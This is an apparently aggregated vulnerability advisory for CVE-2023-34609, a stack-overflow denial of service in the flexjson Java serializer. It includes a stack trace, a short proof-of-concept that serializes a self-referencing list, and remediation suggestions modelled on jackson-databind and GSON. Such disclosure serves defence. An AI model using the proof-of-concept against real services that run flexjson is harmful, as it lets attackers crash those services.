Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-34609: Flexjson / Bugs / #51 Stack overflow error caused by flexjson serialization List

An issue was discovered flexjson thru 3.3 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

CVE
Open in Source
#vulnerability#google#dos#js#git#java

Stack overflow error caused by flexjson serialization List****Description

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread “main” java.lang.StackOverflowError at java.base/java.util.Stack.push(Stack.java:67) at flexjson.JSONContext.pushTypeContext(JSONContext.java:140) at flexjson.JSONContext.writeOpenArray(JSONContext.java:268) at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24) at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22) at flexjson.JSONContext.transform(JSONContext.java:72) at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28) at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22) at flexjson.JSONContext.transform(JSONContext.java:72) at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28) at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22) at flexjson.JSONContext.transform(JSONContext.java:72) at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28) at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22) at flexjson.JSONContext.transform(JSONContext.java:72) at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28) at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22) at flexjson.JSONContext.transform(JSONContext.java:72) at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28) at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22) at flexjson.JSONContext.transform(JSONContext.java:72)

PoC

<dependency> <groupId>net.sf.flexjson</groupId> <artifactId>flexjson</artifactId> <version>3.3</version> </dependency>

importflexjson.JSONSerializer;

importjava.util.ArrayList;

publicclass PoC3{ publicstaticvoidmain(String[]args){

ArrayList<Object>list=newArrayList<>(); list.add(list);

Strings=newJSONSerializer().deepSerialize(list); } }

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. https://github.com/jettison-json/jettison/issues/52
  2. https://github.com/jettison-json/jettison/pull/53/files

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE